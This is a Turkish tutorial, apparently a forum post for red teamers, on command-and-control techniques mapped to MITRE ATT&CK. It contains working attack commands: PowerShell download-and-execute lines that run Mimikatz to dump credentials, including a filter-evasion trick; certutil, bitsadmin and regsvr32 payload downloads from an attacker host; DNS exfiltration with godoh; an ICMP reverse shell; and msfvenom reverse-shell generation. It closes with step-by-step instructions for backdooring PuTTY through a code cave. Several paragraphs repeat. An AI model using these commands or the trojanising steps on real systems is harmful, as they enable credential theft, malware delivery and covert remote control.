Active Directory & Forest Saldırı
Command ve Control
Saldırganlar, hacklenmiş sistemler veya ağlarla iletişim kurmak ve bunları kontrol etmek için bir C2 (Komuta ve Kontrol) metodu kullanırlar
Hedef bilgisayar, kurulan kanalıyla ek zararlı yazılımlar yükleyebilir, verileri çıkarabilir ve virüsü ek ağ kaynaklarına yayabilir
C2 Saldırılarında Kullanılan Sunucu Modelleri:
Merkezi (Centralized)
Bu en çok kullanılan model ve kullanıcı-sunucu haberleşmesi şeklindedir. C2'den gelen komutlar tek bir kaynak adresten gelir (komutları tek bir merkezi sunucudan bekliyorlar),
eğer C2 sunucu ip'si SOC ekibi tarafından blok edilse, tüm hedefler kaybolacaktır
Bunu çözmek için (tespit edilmekten kaçınmak için) Saldırganlar kurulumlarında proxy'ler, redirektörler kullanabilirler
Eşler arası (Peer-To-Peer, P2P)
Zararlı ağdaki her yeni cihaz konfigürasyonları bir komut sunucusundan değil, saldırganın kontrol ettiği ağdaki bilgisayarlardan birinden alır
Bu da P2P modelinin tespit edilmesini zorlaştırır. Tespit edilse bile, genellikle bir anda sadece bir node'u kapatmak mümkündür
Botnet'in kompleksliği ve merkezi olmayan özelliği sebebiyle hükümetin Botnet'i doğrudan kapatmak mümkün olmayan zamanlar vardır
Daha sonra C2 sunucuları kapatmak için hosting şirketleriyle birlikte hareket edip,
botnet'in kurumsal ağ bağlantısını sağlayan komuta ve kontrol (C2) sunucularını kapattılar
ICEBERG
Örnek olarak verdiğim ICEBERG'i görebilirsiniz. Burada saldırganlar tarafından operasyonlarda kullanılan farklı C2 türleri:
MITRE ATT&CK
MITRE ATT&CK'ye göre, saldırganlar tarafından kullanılan 16'dan fazla farklı komuta ve kontrol taktiği vardır
Örnek olarak verdiğim ICEBERG'i görebilirsiniz. Burada saldırganlar tarafından operasyonlarda kullanılan farklı C2 türleri:
MITRE ATT&CK
MITRE ATT&CK'ye göre, saldırganlar tarafından kullanılan 16'dan fazla farklı komuta ve kontrol taktiği vardır
| Application Layer Protocol (T1071)......................| Uygulama Katmanı Protokolü | Multi-stage Channels (T1104)....................| Çok Aşamalı Kanallar |
| Communication Through Removable Media (T1092)...| Çıkarılabilir Medya Aracılığıyla İletişim | Non-application Layer Protocol (T1095)........| Uygulama Katmanı Olmayan Protokol |
| Data Encoding (T1132 )....................................| Veri Kodlama | Non-standard Port (T1571)........................| Standart Olmayan Port |
| Data Obfuscation (T1001).................................| Veri Gizleme | Protocol Tunneling (T1572)........................| Protokol Tünellemesi |
| Dynamic Resolution (T1568)..............................| Dinamik Çözünürlük | Proxy (T1090)........................................| Proxy |
| Encrypted Channel (T1573)...............................| şifreli kanal | Remote Access Software (T1219).................| Uzaktan Erişim Yazılımı |
| Fallback Channels (T1008)................................| Alternatif Kanallar | Traffic Signaling (T1205)...........................| Trafik Sinyalizasyonu |
| Ingress Tool Transfer (T1105).............................| Giriş Aracı Transferi | Web Service (T1102)................................| Web Hizmeti |
Örnek olarak bazılarını kısaca açıklayacağım:
Ingress Tool Transfer
Dosyalar, araçları hedef ağa getirmek için Komuta ve Kontrol kanalı veya alternatif protokoller yoluyla harici bir saldırgan kontrollü sistemden kopyalanabilir. Saldırganlar, alternatif haberleşme portları yoluyla implantları veya binary dosyalarını yüklemek için living off the land binary'lerini (LOLBins) kullanabilirler
Kendi araçlarını bir ortama getirme prosesi, giriş aracı transferi (Ingress Tool Transfer) olarak adlandırılır
giriş aracı transferi, native Windows binary'leri yoluyla transfer, üçüncü taraf araçlarla transfer kullanılarak yapılabilir
saldırganlar tarafından
powershell , certutil, certreq, BITSAdmin, psexec, regsvr32, regdll32, msbuild, wmic, mshta, mofcomp, windbg, msbuild, cdb, csc..vb. manipule edilebilirlerLOLBAS Ingress Tool Transfer
LOLBAS şu özelliklere sahiptir:
Arbitrary kod çalıştırma, Dosya indirme, yükleme ve kopyalama gibi işlemlerin yapılması, Kod compiling, persistence,
Alternatif Veri Akışlarında (“Alternate Data Streams” - ADS) veri gizleme veya logon'da çalıştırma, UAC bypass, Proses belleğini dumping, DLL enjeksiyonu
rundll32.exeve JScript kodunu çağıran komut satırı kullanılarak bir web sayfası indirilir ve ilk PowerShell stager başlatılır:Rundll32, Windows'ta önceden yüklenmiş bir araçtır ve işletim sistemi içinde Dinamik Bağlantı Kitaplığı (Dynamic Link Library DLL) dosyalarını yükler ve çalıştırır. Saldırgan rundll32.exe'yi manipüle ederek farklı payload'lar ve JavaScript ve PowerShell script'leri çalıştırmak için kullanabilir
Kod:
rundll32.exe javascript:\\..\\mshtml,RunHTMLApplication ;document.write();new%20ActiveXObject(WScript.Shell).Run(powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('hxxps://exampleattack/lll/webax.js');
Kod:
powershell "IEX (New-ObjectNet.WebClient).DownloadString('http://x.x.x.x/xxx'); Invoke-Mimikatz -DumpCreds"http --> “http” string filtrelerini geçirmek:
Kod:
powershell "IEX (New-ObjectNet.WebClient).DownloadString(('htAtp://x.x.x.x/xxx' -replace 'A',''));Invoke-Mimikatz -DumpCreds"Sadece powershell script'leri değil,
Invoke-ReflectivePEInjection kullanarak exe'yi çalıştırmak için belleğe yükleyebiliriz:
Kod:
powershell.exe -exec bypass IEX (New-ObjectNet.WebClient).DownloadString(('htBtp://x.x.x.x/xxx' -replace'B',''));Invoke-ReflectivePEInjection -PEUrl http://x.x.x.x/mimikatz.exe -ExeArgs "sekurlsa::logonpasswords" -ForceASLRCertutil, sertifika yetkilisini (CA) dump etmek ve ekranında göstermek, sertifika zincirlerini modifiye (CA modüllerini konfigüre etmek, backup ve restore etmek ve sertifikaları onaylamak) etmek için kullanılan bir CLI aracıdır. Saldırganın web sunucusundan bir dosya indirmek ve Windows'un temporary folder'ında saklamak için:
Kod:
certutil -URLcache -split -f http://Attacker_IP/payload.exe C:\Windows\Temp\payload.exe
Background Intelligent Transfer Service Admin, indirme veya yükleme işleri oluşturan ve bunların devamlılığını kontrol eden bir komut satırı aracıdır. BITSAdmin, HTTP web sunucularından ve SMB dosya paylaşımlarından dosya indirmek veya bunlara dosya yüklemek için kullanılabilir:
Kod:
bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe c:\Users\thm\Desktop\payload.exe
Regsvr32, Windows Kayıt Defterindeki Dinamik Bağlantı Kitaplıklarını (“Dynamic Link Libraries” - DLL'ler) kaydetmek ve kaydını kaldırmak için kullanılan bir Microsoft komut satırı aracıdır:
Kod:
c:\Windows\System32\regsvr32.exe /s /n /u /i:http://example.com/file.sct Downloads\live0fftheland.dll
c:\Windows\System32\regsvr32.exe c:\Users\thm\Downloads\live0fftheland.dllProtocol Tunneling
Saldırganlar, tespitten/ağ filtrelemesinden kaçmak ve/veya başka türlü erişilemeyecek sistemlere erişim sağlamak için ağ iletişimlerini ayrı bir protokol içinde hedef sisteme tünelleyebilirler
Protokol Tünelleme, Dinamik Resolution sırasında da saldırganlar tarafından manipüle edilebilir. HTTPS yoluyla DNS (DoH) olarak bilinen bu yöntemde, C2 ağının çözümlenmesine yapılacak
talepler şifrelenmiş HTTPS paketleri içinde saklanabilir
DoH, HTTPS protokolünü kullanarak DNS sorularını şifreler. Bu, DNS sorularının hem ağda hem de kullanıcı veya sunucu tarafında eavesdropping ve kurcalanmaya karşı korunmasını sağlar
DoH ile DNS talepleri bir HTTPS bağlantısı yoluyla yollanır, yani web talepleriyle aynı formatta kodlanırlar ve web trafiğiyle aynı şifreleme ve güvenlik kontrolü özelliklerine sahiptirler
Saldırganlar, tespitten/ağ filtrelemesinden kaçmak ve/veya başka türlü erişilemeyecek sistemlere erişim sağlamak için ağ iletişimlerini ayrı bir protokol içinde hedef sisteme tünelleyebilirler
Protokol Tünelleme, Dinamik Resolution sırasında da saldırganlar tarafından manipüle edilebilir. HTTPS yoluyla DNS (DoH) olarak bilinen bu yöntemde, C2 ağının çözümlenmesine yapılacak
talepler şifrelenmiş HTTPS paketleri içinde saklanabilir
DoH, HTTPS protokolünü kullanarak DNS sorularını şifreler. Bu, DNS sorularının hem ağda hem de kullanıcı veya sunucu tarafında eavesdropping ve kurcalanmaya karşı korunmasını sağlar
DoH ile DNS talepleri bir HTTPS bağlantısı yoluyla yollanır, yani web talepleriyle aynı formatta kodlanırlar ve web trafiğiyle aynı şifreleme ve güvenlik kontrolü özelliklerine sahiptirler
Kod:
github.com/sensepost/godoh
godoh --domain example.com c2
Bu komut, DNS A kaydı aramalarını kullanarak bir dosyayı hedef etki alanına yollar ve
Dosya DNS queryları aracılığıyla iletilir, ağ güvenlik sistemleri tarafından bloklanmak veya izlenmek olasılığı daha düşüktür:
godoh --domain targetdomain.com send --file path/to/yourfile.txt
Bir protokolü başka bir protokol içinde saklamak için farklı yollar vardır. Örneğin, saldırganlar şifrelenmiş bir SSH tüneli yoluyla bir verinin iletilmesini sağlayan SSH tünellemesi
(SSH port forwarding) yapabilir
örneğin, Local Port Forwarding --> Local port forwarding local (ssh client) makinedeki bir portu remote (ssh server) makinedeki bir porta yönlendirir ve bu port daha sonra hedef makinedeki bir porta yönlendirilir. Local port forwarding genellikle veritabanı veya VNC sunucusu gibi iç ağda bulunan bir remote servise bağlanmak için kullanılır:
Örneğin, bir iç (private) ağda
mysqldb.host makinesi 3306 portunda açık olan bir MySQL veritabanı sunucunuz var, wspub.host makinesinden erişilebilir ve lokal makinenizdeki MySQL client 'ınızı kullanarak veritabanı sunucusuna bağlanmak istiyorsunuz -->
Kod:
ssh -L 3336:mysqldb.host:3306 [email protected]Remote Port Forwarding --> Remote port forwarding, local port forwarding'in tam aksidir. Remote (ssh server) makinedeki bir portu local (ssh client) makinedeki bir porta yönlendirir ve bu port daha sonra hedef makinedeki bir porta yönlendirilir. Burada, SSH sunucusu verilen bir port'u dinler ve herhangi bir bağlantıyı local SSH client tarafından verilen port'a tüneller, ve daha sonra hedef makinedeki bir porta bağlanır.
Remote port forwarding genellikle şirket içindeki bir servis için dışarıdan birine erişim imkanı vermek için kullanılır
Örneğin lokal makinenizde bir web uygulaması hazırladınız ve bunu developer arkadaşınıza göstermek istiyorsunuz. Public IP'niz yok, bu nedenle diğer kullanıcı uygulamaya internet yoluyla erişemiyor. Eğer remote SSH sunucusuna erişiminiz varsa, remote port forwarding'i şu şekilde yapabilirsiniz:
Kod:
ssh -R 8080:127.0.0.1:3000 -N -f [email protected]Yukarıdaki komut ssh sunucusunun 8080 numaralı portu dinlemesini sağlayacak ve bu porttan gelen tüm trafiği 3000 numaralı porttaki lokal makinenize tünelleyecektir. Arkadaşınız browser'ına
the_ssh_server_ip:8080 yazabilir ve harika uygulamanızı görebilir. Remote port forwarding'i kurmakta sorun oluyorsa, Remote SSH server configuration'da
GatewayPorts 'un yes şeklinde belirlendiğine emin olun.Dynamic port forwarding --> Dynamic port forwarding, local (ssh client) makinede SOCKS proxy sunucusu gibi hareket eden bir soket oluşturmanızı sağlar. Bir client bu porta bağlandığında, bağlantı remote (ssh server) makineye yönlendirilir ve daha sonra hedef makinedeki dinamik bir porta yönlendirilir. Bu şekilde, SOCKS proxy kullanan tüm uygulamalar SSH sunucusuna bağlanacak ve sunucu tüm trafiği asıl hedefine yönlendirecektir:
Kod:
ssh -D 9090 -N -f [email protected]Ancak pivoting için Ligolo yardımcı olabilir. saldırganlara bir tun interface kullanarak reverse TCP/TLS bağlantısından tünel kurma imkanı verir ve SOCKS'e ihtiyaç yoktur:
Tunneling Ligolo
Application Layer Protocol { Uygulama Katmanı Protokolü }
Burada saldırganlar C2 trafiğini gizlemek için standart uygulama protokollerini kullanır. Yaygın ortamlar arasında HTTP, HTTPS, DNS veya SMTP bulunur
Şirket içinde kurulan bağlantılar için (örneğin bir proxy veya pivot node ile diğer node'lar arasındakiler gibi) genellikle kullanılan protokoller SMB, SSH veya RDP'dir
Burada saldırganlar C2 trafiğini gizlemek için standart uygulama protokollerini kullanır. Yaygın ortamlar arasında HTTP, HTTPS, DNS veya SMTP bulunur
Şirket içinde kurulan bağlantılar için (örneğin bir proxy veya pivot node ile diğer node'lar arasındakiler gibi) genellikle kullanılan protokoller SMB, SSH veya RDP'dir
- Application Layer Protocol: Web Protocols ---> HTTP/S ve WebSocket gibi web trafiğini taşıyan protokoller
- Application Layer Protocol: File Transfer Protocols ---> SMB, FTP, FTPS ve TFTP gibi dosya aktarımı yapan protokoller
- Application Layer Protocol: Mail Protocols ---> Elektronik posta taşıyan SMTP/S, POP3/S ve IMAP gibi protokoller
- Application Layer Protocol: DNS ---> DNS, A, OPT ve TXT kayıtları yoluyla DNS
BRC4 payload opsiyonları
Non-application Layer Protocol
Saldırganlar, host ile C2 sunucusu arasında veya bir ağ içindeki hedef hostlar arasında iletişim için ICMP, TCP, UDP, SOCKS,
yönlendirilmiş/tünellenmiş (redirected/tunneled) protokoller gibi OSI Uygulama Katmanı Olmayan (Non-application Layer Protocol) bir protokol kullanırlar
ve saldırganlar AV/EDR tespi̇tleri̇nden kaçmak ve C2 i̇leti̇şi̇mi̇ni̇ tespi̇t etmeyi̇ zorlaştirmak i̇çi̇n bu metotları kullaniyorlar, daha gizli C2 iletişim için icmp iyi bir opsiyon olabilir
ICMP kullanarak C2 haberleşmesi
I.
1. Listener'ı oluşturun:
git clone https://github.com/inquisb/icmpsh.git2. ICMP C2'nin çalışmasını sağlamak için bilgisayar bazlı ICMP'yi kapatmak gerekiyor:
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all3. run icmpsh_m.py:
./icmpsh_m.py4. bir kaynak IP adresi ve bir hedef IP adresi vermemiz gerekir:
II. hedef pc'de çalıştırın:
Kod:
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress #{server_ip}Web Service { Web Hizmeti }
Saldırganlar C2'yi gizlemek için Twitter, Dropbox, VirusTotal, Telegram, GitHub..vb. gibi web hizmetlerini kullanabilir ve izlerini legal trafik arasında saklayabilir
örneğin, Merkezi Olmayan Uzaktan Yönetim Aracı (Decentralized Remote Administration Tool (DRAFT), ENS aracılığıyla merkezi olmayan profil paylaşımı,
Telegram aracılığıyla merkezi olmayan sunucu taraflı uygulama: DRat
C2'ler için Telegram, Twitter, Gmail, Slack, Discord, Google Sheets/Drive, Github, YouTube, Pastebin, Reddit, Zoom, Notion, Dropbox
ve hatta Virustotal API'leri gibi yasal API'leri kullanan C2 projelerini örnek olarak veriyorum
Telegram API ile C2 ---> Disctopia C2, TelegramRAT, Nightmangle
Saldırganlar C2'yi gizlemek için Twitter, Dropbox, VirusTotal, Telegram, GitHub..vb. gibi web hizmetlerini kullanabilir ve izlerini legal trafik arasında saklayabilir
örneğin, Merkezi Olmayan Uzaktan Yönetim Aracı (Decentralized Remote Administration Tool (DRAFT), ENS aracılığıyla merkezi olmayan profil paylaşımı,
Telegram aracılığıyla merkezi olmayan sunucu taraflı uygulama: DRat
C2'ler için Telegram, Twitter, Gmail, Slack, Discord, Google Sheets/Drive, Github, YouTube, Pastebin, Reddit, Zoom, Notion, Dropbox
ve hatta Virustotal API'leri gibi yasal API'leri kullanan C2 projelerini örnek olarak veriyorum
API detection:
Requests to https://api.telegram.org/bot*Twitter API ile C2 ---> twittor
API detection:
Requests to https://api.twitter.com/1*,https://api.twitter.com/2*, https://upload.twitter.com/, https://api.twitter.com/oauth*Gmail API ile C2 ---> gcat, gmailc2
API detection:
Requests to https://www.googleapis.com/gmail/*, https://www.googleapis.com/auth/*Google Sheet/Google Drive API ile C2 ---> GC2-sheet, google_rat
API detection:
Requests to https://sheets.googleapis.com/*, https://www.googleapis.com/drive/*Google Calendar ile C2 ---> GCR-Google-Calendar-RAT
API detection:
Requests to https://www.googleapis.com/auth/calendar*Dropbox API ile C2 ---> DBC2
API detection:
Requests to https://api.dropboxapi.com/*Virustotal API ile C2 ---> D1rkMtr/VirusTotalC2, VirusTotalC2
API detection:
Requests to https://www.virustotal.com/api/v3/*/comments, https://www.virustotal.com/api/v2/*/comments...
Remote Access Software { Uzaktan Erişim Yazılımı }
Saldırgan, ağlardaki hedef sistemlere interaktif bir komuta ve kontrol kanalı kurmak için legal desktop desteği ve uzaktan erişim yazılımlarını kullanabilir
VNC: ultravnc, tightvnc..vb., Team Viewer, ScreenConnect, AmmyyAdmin, Anydesk, PuTTy, ConnectWise Control, Remote Utilities, ..vb.
Saldırganlar bunları kullanmadan önce, ilk olarak modifiye ederler, örneğin kullanıcı ekranında ekstra bildirimler açılmaz ve diğer modifikasyonlar yapılır
Saldırganlar hedef cihazlara backdoor yüklemek için PuTTY SSH uygulamasının trojanlı veya backdoor versiyonlarını kullanırlar
PuTTY'nin data section'ına zararlı bir payload yerleştirilerek modifiye edilebilir, bu da sahte versiyonu legal versiyondan çok büyük hale getirir
Payload'u exe'nin farklı bölümlerinde saklama imkanımız var:Saldırgan, ağlardaki hedef sistemlere interaktif bir komuta ve kontrol kanalı kurmak için legal desktop desteği ve uzaktan erişim yazılımlarını kullanabilir
VNC: ultravnc, tightvnc..vb., Team Viewer, ScreenConnect, AmmyyAdmin, Anydesk, PuTTy, ConnectWise Control, Remote Utilities, ..vb.
Saldırganlar bunları kullanmadan önce, ilk olarak modifiye ederler, örneğin kullanıcı ekranında ekstra bildirimler açılmaz ve diğer modifikasyonlar yapılır
Saldırganlar hedef cihazlara backdoor yüklemek için PuTTY SSH uygulamasının trojanlı veya backdoor versiyonlarını kullanırlar
PuTTY'nin data section'ına zararlı bir payload yerleştirilerek modifiye edilebilir, bu da sahte versiyonu legal versiyondan çok büyük hale getirir
.text (bölüm programın çalıştırılabilecek kodunu saklar) ---> Payload'u bu bölümde saklamak için programımızın fonksiyonlarından birine koymamız gerekir
.data (data bölümü başlatılan verileri saklar) ---> Payload'umuzun sadece read-only olduğunu compiler'a bildirmemiz gerekiyor ve bunu payload'umuzu global bir variable'da saklayarak yapabiliriz
.rdata (read-only veriler - literal stringler, constantlar ve debug directory bilgileri gibi) ---> burada variable artık const quilifier tarafından prosedürlenir
.rsrc (program tarafından kullanılan kaynakları içerir; bunlar arasında resimler, ikonlar ve hatta embedded binary'ler vardır) ---> Payload'u bir kaynak olarak saklayın. Örneğin bir resim, bir ikon vb. gibi
Örneğin, PuTTY, KiTTY, TightVNC, Sumatra PDF Reader ve muPDF/Subliminal Recording yazılım yükleyicisinin trojanlı versiyonlarını kullanan
“Lazarus” grubu (diğer adıyla HIDDEN COBRA, ZINC, Labyrinth Chollima ve Black Artemis) Operation Dream Job'da bunu yapmıştır.
Trojanlı PuTTY
.rdata .data .text i̇le deği̇l, Code Cave tekni̇ği̇ i̇le örnek vereli̇m:
Bu "boş | 0x00 " yerler code caves olarak bilinir ve neredeyse tüm executable dosyalarda vardır. Genellikle 0xCC, 0x90 veya 0x00 bytelardan oluşur
örneğin, gerekli araçlar:Bu "boş | 0x00 " yerler code caves olarak bilinir ve neredeyse tüm executable dosyalarda vardır. Genellikle 0xCC, 0x90 veya 0x00 bytelardan oluşur
--> herhangi bir debugger kullanın: OllyDbg, binary ninja,..vb. , ama biz x64dbg kullanıyoruz
--> putty
1. putty.exe dosyasını debugger'da açın
2. programı ilk çalıştırmadan önce stop için debugger tarafından konulan giriş breakpoint'ini görüyoruz
EntryPoint
3. sonra tüm 0'ların mevcut bir yeri seçin { shellcode'umuzu yerleştirmek için yer arayın }
---> copy { 0045CD41 }
Burada shellcodumuzu yerleştireceğiz ve entrypoint'e tekrar jump edeceğiz:
4.
ama önce, entrypoint'e tekrar gidip, bir jump oluşturmamız gerekiyor: EntryPoint: 00454EB0 ---> 0045CD41
[right click ---> Assembly]
jmp 0x0045CD41 ---> ok | [double-click] --> 0045CD41
5. yapılan değişiklikleri kaydetmek için şunları yazıyoruz: { 0045CD41 }
pushad: Registry verilerini saklar
pushfd: flag verilerini saklar
ve pushad ve pushfd yerleştirin:
Şimdi shellcode'umuzu yerleştirebiliriz:
Binary ---> Edit
calc shellcode kullanıyoruz
ama herhangi bir shellcode kullanmak mümkün: msf, CS, BRC4,..vb.
örneğin msf ile reverse shell:
Kod:
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=[ip] LPORT=[port] EXITFUNC=none -f hex6. shellcode yerleştirdikten sonra:
0045CE0B program çıkışını tutmak için atlamadan sonra vardığımız yerin adresidir
[right click ---> Assembly]
jmp 0x0045CE0B ---> ok
7.
şunları yazıyoruz: popfd ve popad
8. kaydettiğim entrypoint komutlar
Kod:
00454EB0 | 6A 60 | push 60
00454EB2 | 68 707B4700 | push putty.477B70
00454EB7 | E8 08210000 | call putty.456FC4
00454EBC | BF 94000000 | mov edi,94
00454EC1 | 8BC7 | mov eax,edi6A 60 68 707B4700
Sonra putty executable çağrısına tekrar jump edeceğiz:
00454EB7
Ardından, [right-click] ---> Patches -->Select All --> Patch File : putty.exe
fluidattacks
Herkese teşekkür ederim,
Öğrendiğim bilgileri paylaştım ve umarım bu paylaştığım bilgiler Red Team çalışmalarınızda size yardımcı olur
